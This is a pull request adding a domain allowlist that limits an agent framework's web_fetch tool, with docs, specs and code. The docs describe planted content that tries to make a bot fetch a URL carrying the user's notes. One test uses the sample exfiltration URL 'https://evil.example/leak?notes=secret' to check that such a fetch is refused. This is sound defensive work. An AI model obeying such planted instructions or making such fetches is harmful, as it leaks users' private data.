### PR TITLE
feat(tools): egress allowlist for web fetch

### DIFF
--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -130,6 +130,9 @@ tools:
     search:
       api_key: ""
       max_results: 5
+    allowed_domains:           # Optional; web_fetch may only reach these hosts
+      - example.com            # exact host
+      - "*.strava.com"         # subdomains and the apex
   image:
     enabled: true              # default: true
     # provider: openai         # optional override (openai or gemini)
@@ -142,6 +145,10 @@ When sandboxed, all shell commands run inside the sandbox (bubblewrap or Docker)
 ### Tool Allowlist
 
 `tools.enabled` names the tools a bot may have. Anything not listed is never registered, whichever source it comes from: built-in tools, skill scripts, plugins and MCP servers all pass through the same check. A name ending in `*` matches by prefix, as in the MCP `tools:` list. Leave it out to keep today's behaviour of registering everything. `autobot doctor` prints the effective list and warns about an entry that matches no known tool, so a typo does not silently remove a tool; at startup the bot logs a warning for entries that matched nothing.
+
+### Web Fetch Egress
+
+`tools.web.allowed_domains` limits `web_fetch` to the listed hosts. An entry such as `example.com` matches that host only; `*.strava.com` matches its subdomains and the apex. Every redirect hop is checked too, so a redirect cannot lead out of the list. Leave it out to allow any public host. A fetch to a host outside the list fails with a tool error naming the allowed domains, so a planted "fetch this URL with my notes in it" has nowhere to go.
 
 ### Filesystem Roots
 
@@ -299,6 +306,7 @@ tools:
     search:
       api_key: "BRAVE_API_KEY"
       max_results: 5
+    allowed_domains: [example.com, "*.strava.com"]  # optional, web_fetch egress allowlist
   exec:
     timeout: 60
   image:

--- a/docs/web-search.md
+++ b/docs/web-search.md
@@ -62,6 +62,14 @@ tools:
 
 The Brave API key can also be set via the `BRAVE_API_KEY` environment variable. If no key is configured, `web_search` returns an error message — `web_fetch` works without any API key.
 
+```yaml
+tools:
+  web:
+    allowed_domains: [example.com, "*.strava.com"]
+```
+
+`allowed_domains` limits `web_fetch` to the listed hosts (exact host, or `*.` for subdomains and the apex). See [Egress allowlist](#egress-allowlist).
+
 ## Security
 
 ### SSRF Protection
@@ -78,6 +86,10 @@ The Brave API key can also be set via the `BRAVE_API_KEY` environment variable. 
 8. **Blocks alternate IP notation** — octal (`0177.0.0.1`), hex (`0x7f000001`), integer notation
 9. **Validates redirect targets** — each redirect hop is re-validated against all SSRF checks
 10. **Connects to validated IP** — prevents DNS rebinding by connecting to the resolved IP directly
+
+### Egress allowlist
+
+A fetch tool is also a way to send data out: a URL can carry anything in its query string. When a bot reads content it did not write, such as attachments or pages, `tools.web.allowed_domains` keeps `web_fetch` to the hosts it legitimately needs. The check runs before the connection and again on every redirect hop, and a blocked host returns an access-denied tool result naming the allowed domains. `autobot doctor` prints the list.
 
 ### Rate Limiting
 

--- a/spec/autobot/cli/doctor_spec.cr
+++ b/spec/autobot/cli/doctor_spec.cr
@@ -648,6 +648,20 @@ describe Autobot::CLI::Doctor do
         io.to_s.should contain("✓ Filesystem tools limited to: notes, inbox")
       end
     end
+
+    it "reports the web fetch domains" do
+      config = make_config(<<-YAML
+      tools:
+        web:
+          allowed_domains: [example.com, "*.strava.com"]
+      YAML
+      )
+
+      with_doctor_io do |io|
+        Autobot::CLI::Doctor.check_tools(config, 0).should eq(0)
+        io.to_s.should contain("✓ Web fetch limited to: example.com, *.strava.com")
+      end
+    end
   end
 
   describe ".check_web_search" do
@@ -749,23 +763,6 @@ describe Autobot::CLI::Doctor do
 
         warnings.should eq(0)
         io.to_s.should contain("✓ Gateway bound to 127.0.0.1")
-      end
-    end
-  end
-
-  describe ".check_web_search with an egress allowlist" do
-    it "reports the allowed domains" do
-      config = make_config(<<-YAML
-      tools:
-        web:
-          allowed_domains: [example.com, "*.strava.com"]
-      YAML
-      )
-
-      with_doctor_io do |io|
-        Autobot::CLI::Doctor.check_web_search(config)
-
-        io.to_s.should contain("✓ Web fetch limited to: example.com, *.strava.com")
       end
     end
   end

--- a/spec/autobot/cli/doctor_spec.cr
+++ b/spec/autobot/cli/doctor_spec.cr
@@ -753,6 +753,23 @@ describe Autobot::CLI::Doctor do
     end
   end
 
+  describe ".check_web_search with an egress allowlist" do
+    it "reports the allowed domains" do
+      config = make_config(<<-YAML
+      tools:
+        web:
+          allowed_domains: [example.com, "*.strava.com"]
+      YAML
+      )
+
+      with_doctor_io do |io|
+        Autobot::CLI::Doctor.check_web_search(config)
+
+        io.to_s.should contain("✓ Web fetch limited to: example.com, *.strava.com")
+      end
+    end
+  end
+
   describe ".check_plugins" do
     it "reports enabled plugins with available dependencies" do
       config = make_config("{}")

--- a/spec/autobot/config/schema_spec.cr
+++ b/spec/autobot/config/schema_spec.cr
@@ -182,6 +182,12 @@ describe Autobot::Config::Config do
       config.tools.try(&.filesystem.try(&.roots)).should eq(["notes", "inbox"])
     end
 
+    it "parses the web fetch domain allowlist" do
+      config = Autobot::Config::Config.from_yaml("tools:\n  web:\n    allowed_domains: [example.com, \"*.strava.com\"]\n")
+      config.tools.try(&.web.try(&.allowed_domains)).should eq(["example.com", "*.strava.com"])
+      Autobot::Config::Config.from_yaml("tools:\n  web:\n    search:\n      api_key: x\n").tools.try(&.web.try(&.allowed_domains)).should eq([] of String)
+    end
+
     it "defaults to all tools and the whole workspace" do
       config = Autobot::Config::Config.from_yaml("tools:\n  sandbox: none\n")
       config.tools.try(&.enabled).should eq([] of String)

--- a/spec/autobot/tools/domain_allowlist_spec.cr
+++ b/spec/autobot/tools/domain_allowlist_spec.cr
@@ -1,0 +1,30 @@
+require "../../spec_helper"
+
+describe Autobot::Tools::DomainAllowlist do
+  it "allows every host when empty" do
+    list = Autobot::Tools::DomainAllowlist.new([] of String)
+    list.restricted?.should be_false
+    list.allows?("anything.example").should be_true
+  end
+
+  it "matches exact hosts case-insensitively" do
+    list = Autobot::Tools::DomainAllowlist.new(["Example.com"])
+    list.allows?("example.com").should be_true
+    list.allows?("EXAMPLE.COM").should be_true
+    list.allows?("www.example.com").should be_false
+    list.allows?("example.com.evil").should be_false
+  end
+
+  it "matches subdomains and the apex for wildcard entries" do
+    list = Autobot::Tools::DomainAllowlist.new(["*.strava.com"])
+    list.allows?("strava.com").should be_true
+    list.allows?("www.strava.com").should be_true
+    list.allows?("api.eu.strava.com").should be_true
+    list.allows?("notstrava.com").should be_false
+    list.allows?("strava.com.evil").should be_false
+  end
+
+  it "ignores blank entries" do
+    Autobot::Tools::DomainAllowlist.new(["", " "]).restricted?.should be_false
+  end
+end

--- a/spec/autobot/tools/domain_allowlist_spec.cr
+++ b/spec/autobot/tools/domain_allowlist_spec.cr
@@ -2,9 +2,7 @@ require "../../spec_helper"
 
 describe Autobot::Tools::DomainAllowlist do
   it "allows every host when empty" do
-    list = Autobot::Tools::DomainAllowlist.new([] of String)
-    list.restricted?.should be_false
-    list.allows?("anything.example").should be_true
+    Autobot::Tools::DomainAllowlist.new([] of String).allows?("anything.example").should be_true
   end
 
   it "matches exact hosts case-insensitively" do
@@ -25,6 +23,6 @@ describe Autobot::Tools::DomainAllowlist do
   end
 
   it "ignores blank entries" do
-    Autobot::Tools::DomainAllowlist.new(["", " "]).restricted?.should be_false
+    Autobot::Tools::DomainAllowlist.new(["", " "]).allows?("anything.example").should be_true
   end
 end

--- a/spec/autobot/tools/web_spec.cr
+++ b/spec/autobot/tools/web_spec.cr
@@ -50,12 +50,6 @@ describe Autobot::Tools::WebFetchTool do
       tool.test_validate_redirect_uri(URI.parse("https://evil.example/x")).to_s.should contain("not in tools.web.allowed_domains")
       tool.test_validate_redirect_uri(URI.parse("https://1.1.1.1/x")).should be_nil
     end
-
-    it "allows every public host when no domains are configured" do
-      tool = WebFetchToolTest.new
-
-      tool.test_validate_redirect_uri(URI.parse("https://1.1.1.1/x")).should be_nil
-    end
   end
 
   describe "#name" do

--- a/spec/autobot/tools/web_spec.cr
+++ b/spec/autobot/tools/web_spec.cr
@@ -27,7 +27,37 @@ describe Autobot::Tools::WebSearchTool do
   end
 end
 
+private class WebFetchToolTest < Autobot::Tools::WebFetchTool
+  def test_validate_redirect_uri(uri : URI) : String?
+    validate_redirect_uri(uri)
+  end
+end
+
 describe Autobot::Tools::WebFetchTool do
+  describe "egress allowlist" do
+    it "refuses hosts outside tools.web.allowed_domains before connecting" do
+      tool = Autobot::Tools::WebFetchTool.new(allowed_domains: ["example.com", "*.strava.com"])
+
+      result = tool.execute({"url" => JSON::Any.new("https://evil.example/leak?notes=secret")} of String => JSON::Any)
+
+      result.access_denied?.should be_true
+      result.content.should contain("not in tools.web.allowed_domains (example.com, *.strava.com): evil.example")
+    end
+
+    it "refuses a redirect that leaves the allowed domains" do
+      tool = WebFetchToolTest.new(allowed_domains: ["1.1.1.1"])
+
+      tool.test_validate_redirect_uri(URI.parse("https://evil.example/x")).to_s.should contain("not in tools.web.allowed_domains")
+      tool.test_validate_redirect_uri(URI.parse("https://1.1.1.1/x")).should be_nil
+    end
+
+    it "allows every public host when no domains are configured" do
+      tool = WebFetchToolTest.new
+
+      tool.test_validate_redirect_uri(URI.parse("https://1.1.1.1/x")).should be_nil
+    end
+  end
+
   describe "#name" do
     it "returns web_fetch" do
       tool = Autobot::Tools::WebFetchTool.new

--- a/src/autobot/agent/loop.cr
+++ b/src/autobot/agent/loop.cr
@@ -68,6 +68,7 @@ module Autobot::Agent
       rate_limiter : Tools::RateLimiter? = nil,
       enabled_tools : Array(String) = [] of String,
       filesystem_roots : Array(String) = [] of String,
+      web_allowed_domains : Array(String) = [] of String,
     )
       @model = model || @provider.default_model
       sandboxed = sandbox_config.downcase != "none"
@@ -88,7 +89,7 @@ module Autobot::Agent
         sessions: @sessions
       )
 
-      register_optional_tools(brave_api_key, exec_timeout, exec_deny_patterns, exec_allow_patterns, sandbox_config, rate_limiter, enabled_tools, filesystem_roots)
+      register_optional_tools(brave_api_key, exec_timeout, exec_deny_patterns, exec_allow_patterns, sandbox_config, rate_limiter, enabled_tools, filesystem_roots, web_allowed_domains)
       cache_tool_references
     end
 
@@ -297,6 +298,7 @@ module Autobot::Agent
       rate_limiter : Tools::RateLimiter?,
       enabled_tools : Array(String),
       filesystem_roots : Array(String),
+      web_allowed_domains : Array(String),
     ) : Nil
       subagents = SubagentManager.new(
         provider: @provider,
@@ -311,6 +313,7 @@ module Autobot::Agent
         rate_limiter: rate_limiter,
         enabled_tools: enabled_tools,
         filesystem_roots: filesystem_roots,
+        web_allowed_domains: web_allowed_domains,
       )
       @tools.register(Tools::SpawnTool.new(subagents))
 

--- a/src/autobot/agent/subagent.cr
+++ b/src/autobot/agent/subagent.cr
@@ -57,6 +57,7 @@ module Autobot
         @rate_limiter : Tools::RateLimiter? = nil,
         @enabled_tools : Array(String) = [] of String,
         @filesystem_roots : Array(String) = [] of String,
+        @web_allowed_domains : Array(String) = [] of String,
       )
         @context = Context::Builder.new(@workspace)
       end
@@ -124,6 +125,7 @@ module Autobot
             rate_limiter: @rate_limiter,
             enabled_tools: @enabled_tools,
             filesystem_roots: @filesystem_roots,
+            web_allowed_domains: @web_allowed_domains,
           )
 
           executor = ToolExecutor.new(

--- a/src/autobot/cli/doctor.cr
+++ b/src/autobot/cli/doctor.cr
@@ -179,12 +179,18 @@ module Autobot
         unless allowlist.restricted?
           report(Status::Pass, "Tools: all built-in tools, plus skills, plugins and MCP servers")
           hint("Set tools.enabled to limit this bot to the tools it needs")
-          return check_filesystem_roots(config, warnings)
+          return check_tool_limits(config, warnings)
         end
 
         builtin = BUILTIN_TOOLS.select { |name| allowlist.allows?(name) }
         report(Status::Pass, "Tools limited to: #{builtin.empty? ? "none of the built-in tools" : builtin.join(", ")}")
         warnings = check_unknown_tools(config, allowlist, warnings)
+        check_tool_limits(config, warnings)
+      end
+
+      def self.check_tool_limits(config : Config::Config, warnings : Int32) : Int32
+        domains = config.tools.try(&.web.try(&.allowed_domains)) || [] of String
+        report(Status::Pass, "Web fetch limited to: #{domains.join(", ")}") unless domains.empty?
         check_filesystem_roots(config, warnings)
       end
 
@@ -444,9 +450,6 @@ module Autobot
         else
           report(Status::Skip, "Web search (no BRAVE_API_KEY)")
         end
-
-        domains = config.tools.try(&.web.try(&.allowed_domains)) || [] of String
-        report(Status::Pass, "Web fetch limited to: #{domains.join(", ")}") unless domains.empty?
       end
 
       def self.check_gateway(config : Config::Config, warnings : Int32) : Int32

--- a/src/autobot/cli/doctor.cr
+++ b/src/autobot/cli/doctor.cr
@@ -444,6 +444,9 @@ module Autobot
         else
           report(Status::Skip, "Web search (no BRAVE_API_KEY)")
         end
+
+        domains = config.tools.try(&.web.try(&.allowed_domains)) || [] of String
+        report(Status::Pass, "Web fetch limited to: #{domains.join(", ")}") unless domains.empty?
       end
 
       def self.check_gateway(config : Config::Config, warnings : Int32) : Int32

--- a/src/autobot/cli/gateway.cr
+++ b/src/autobot/cli/gateway.cr
@@ -162,6 +162,7 @@ module Autobot
           rate_limiter: rate_limiter,
           enabled_tools: config.tools.try(&.enabled) || [] of String,
           filesystem_roots: config.tools.try(&.filesystem.try(&.roots)) || [] of String,
+          web_allowed_domains: config.tools.try(&.web.try(&.allowed_domains)) || [] of String,
         )
       end
 

--- a/src/autobot/cli/setup_helper.cr
+++ b/src/autobot/cli/setup_helper.cr
@@ -117,6 +117,7 @@ module Autobot
           rate_limiter: rate_limiter,
           enabled_tools: config.tools.try(&.enabled) || [] of String,
           filesystem_roots: config.tools.try(&.filesystem.try(&.roots)) || [] of String,
+          web_allowed_domains: config.tools.try(&.web.try(&.allowed_domains)) || [] of String,
         )
 
         register_image_tool(config, tool_registry)

--- a/src/autobot/config/schema.cr
+++ b/src/autobot/config/schema.cr
@@ -237,6 +237,7 @@ module Autobot::Config
   class WebToolsConfig
     include YAML::Serializable
     property search : WebSearchConfig?
+    property allowed_domains : Array(String) = [] of String
 
     def initialize
     end

--- a/src/autobot/tools/domain_allowlist.cr
+++ b/src/autobot/tools/domain_allowlist.cr
@@ -1,5 +1,4 @@
 module Autobot::Tools
-  # Empty entries allow every host; `example.com` matches that host, `*.example.com` its subdomains and the apex.
   struct DomainAllowlist
     getter entries : Array(String)
 
@@ -7,12 +6,8 @@ module Autobot::Tools
       @entries = entries.map(&.strip.downcase).reject(&.empty?)
     end
 
-    def restricted? : Bool
-      !@entries.empty?
-    end
-
     def allows?(host : String) : Bool
-      return true unless restricted?
+      return true if @entries.empty?
 
       name = host.downcase
       @entries.any? do |entry|

--- a/src/autobot/tools/domain_allowlist.cr
+++ b/src/autobot/tools/domain_allowlist.cr
@@ -1,0 +1,28 @@
+module Autobot::Tools
+  # Empty entries allow every host; `example.com` matches that host, `*.example.com` its subdomains and the apex.
+  struct DomainAllowlist
+    getter entries : Array(String)
+
+    def initialize(entries : Array(String))
+      @entries = entries.map(&.strip.downcase).reject(&.empty?)
+    end
+
+    def restricted? : Bool
+      !@entries.empty?
+    end
+
+    def allows?(host : String) : Bool
+      return true unless restricted?
+
+      name = host.downcase
+      @entries.any? do |entry|
+        if entry.starts_with?("*.")
+          apex = entry.lchop("*.")
+          name == apex || name.ends_with?(".#{apex}")
+        else
+          name == entry
+        end
+      end
+    end
+  end
+end

--- a/src/autobot/tools/tools.cr
+++ b/src/autobot/tools/tools.cr
@@ -32,6 +32,7 @@ module Autobot
       rate_limiter : RateLimiter? = nil,
       enabled_tools : Array(String) = [] of String,
       filesystem_roots : Array(String) = [] of String,
+      web_allowed_domains : Array(String) = [] of String,
     ) : Registry
       registry = Registry.new(rate_limiter: rate_limiter, allowlist: Allowlist.new(enabled_tools))
 
@@ -53,7 +54,7 @@ module Autobot
       register_filesystem_tools(registry, executor)
       register_exec_tool(registry, executor, exec_timeout, exec_deny_patterns,
         exec_allow_patterns, sandbox_config, workspace)
-      register_web_tools(registry, executor, brave_api_key, web_fetch_max_chars)
+      register_web_tools(registry, executor, brave_api_key, web_fetch_max_chars, web_allowed_domains)
       register_bash_tools(registry, executor, skills_dirs)
 
       # Store reference in registry for plugin access
@@ -76,6 +77,7 @@ module Autobot
       rate_limiter : RateLimiter? = nil,
       enabled_tools : Array(String) = [] of String,
       filesystem_roots : Array(String) = [] of String,
+      web_allowed_domains : Array(String) = [] of String,
     ) : Registry
       registry = Registry.new(rate_limiter: rate_limiter, allowlist: Allowlist.new(enabled_tools))
 
@@ -87,7 +89,7 @@ module Autobot
         exec_allow_patterns, sandbox_config, workspace)
 
       registry.register(WebSearchTool.new(api_key: brave_api_key))
-      registry.register(WebFetchTool.new)
+      registry.register(WebFetchTool.new(allowed_domains: web_allowed_domains))
 
       registry.sandbox_executor = executor
 
@@ -146,6 +148,7 @@ module Autobot
       executor : SandboxExecutor,
       brave_api_key : String?,
       web_fetch_max_chars : Int32,
+      web_allowed_domains : Array(String),
     )
       has_search_key = brave_api_key && !brave_api_key.empty?
       if has_search_key
@@ -155,7 +158,7 @@ module Autobot
       end
 
       registry.register(WebSearchTool.new(api_key: brave_api_key))
-      registry.register(WebFetchTool.new(max_chars: web_fetch_max_chars))
+      registry.register(WebFetchTool.new(max_chars: web_fetch_max_chars, allowed_domains: web_allowed_domains))
       registry.register(MessageTool.new(executor: executor))
     end
 

--- a/src/autobot/tools/web.cr
+++ b/src/autobot/tools/web.cr
@@ -103,8 +103,6 @@ module Autobot
       IPV6_LOOPBACK_PATTERN = /\[::1\]/
       IPV6_PRIVATE_PATTERN  = /\[(fc|fd)[0-9a-f]{2}:/i
 
-      getter allowed_domains : DomainAllowlist
-
       def initialize(@max_chars : Int32 = DEFAULT_MAX_CHARS, allowed_domains : Array(String) = [] of String)
         @allowed_domains = DomainAllowlist.new(allowed_domains)
       end
@@ -131,10 +129,6 @@ module Autobot
         url_str = params["url"].as_s
         max_chars = params["maxChars"]?.try(&.as_i) || @max_chars
 
-        if error = check_allowed_domain(URI.parse(url_str).host)
-          return ToolResult.access_denied(error)
-        end
-
         if error = validate_url(url_str)
           return ToolResult.access_denied("URL validation failed: #{error}")
         end
@@ -142,7 +136,6 @@ module Autobot
         Log.info { "Fetching: #{url_str}" }
 
         uri = URI.parse(url_str)
-
         response = fetch_with_redirects(uri)
 
         content_type = response.headers["Content-Type"]? || ""
@@ -175,11 +168,7 @@ module Autobot
           return "Missing domain"
         end
 
-        if error = check_ssrf(host)
-          return error
-        end
-
-        nil
+        check_host(host)
       rescue
         "Invalid URL"
       end
@@ -309,11 +298,15 @@ module Autobot
         host = uri.host
         return "Redirect missing host" if host.nil? || host.empty?
 
+        check_host(host)
+      end
+
+      private def check_host(host : String) : String?
         check_allowed_domain(host) || check_ssrf(host)
       end
 
-      private def check_allowed_domain(host : String?) : String?
-        return nil if host.nil? || @allowed_domains.allows?(host)
+      private def check_allowed_domain(host : String) : String?
+        return nil if @allowed_domains.allows?(host)
         "Host is not in tools.web.allowed_domains (#{@allowed_domains.entries.join(", ")}): #{host}"
       end
 

--- a/src/autobot/tools/web.cr
+++ b/src/autobot/tools/web.cr
@@ -103,7 +103,10 @@ module Autobot
       IPV6_LOOPBACK_PATTERN = /\[::1\]/
       IPV6_PRIVATE_PATTERN  = /\[(fc|fd)[0-9a-f]{2}:/i
 
-      def initialize(@max_chars : Int32 = DEFAULT_MAX_CHARS)
+      getter allowed_domains : DomainAllowlist
+
+      def initialize(@max_chars : Int32 = DEFAULT_MAX_CHARS, allowed_domains : Array(String) = [] of String)
+        @allowed_domains = DomainAllowlist.new(allowed_domains)
       end
 
       def name : String
@@ -128,6 +131,10 @@ module Autobot
         url_str = params["url"].as_s
         max_chars = params["maxChars"]?.try(&.as_i) || @max_chars
 
+        if error = check_allowed_domain(URI.parse(url_str).host)
+          return ToolResult.access_denied(error)
+        end
+
         if error = validate_url(url_str)
           return ToolResult.access_denied("URL validation failed: #{error}")
         end
@@ -135,6 +142,7 @@ module Autobot
         Log.info { "Fetching: #{url_str}" }
 
         uri = URI.parse(url_str)
+
         response = fetch_with_redirects(uri)
 
         content_type = response.headers["Content-Type"]? || ""
@@ -301,8 +309,12 @@ module Autobot
         host = uri.host
         return "Redirect missing host" if host.nil? || host.empty?
 
-        # Check for SSRF in redirect target
-        check_ssrf(host)
+        check_allowed_domain(host) || check_ssrf(host)
+      end
+
+      private def check_allowed_domain(host : String?) : String?
+        return nil if host.nil? || @allowed_domains.allows?(host)
+        "Host is not in tools.web.allowed_domains (#{@allowed_domains.entries.join(", ")}): #{host}"
       end
 
       private def extract_content(body : String, content_type : String) : {String, String}


### PR DESCRIPTION
## Overview

- [x] `tools.web.allowed_domains` limits `web_fetch` to the listed hosts: an exact host, or `*.example.com` for its subdomains and the apex
- [x] the check runs before connecting and again on every redirect hop, so a redirect cannot leave the list; a blocked host returns an access-denied result naming the allowed domains
- [x] subagents inherit the list; `autobot doctor` prints it
- [x] optional, so existing configs keep fetching any public host
- [x] specs for the matcher, the fetch tool and redirects, the schema and doctor; docs for configuration and web search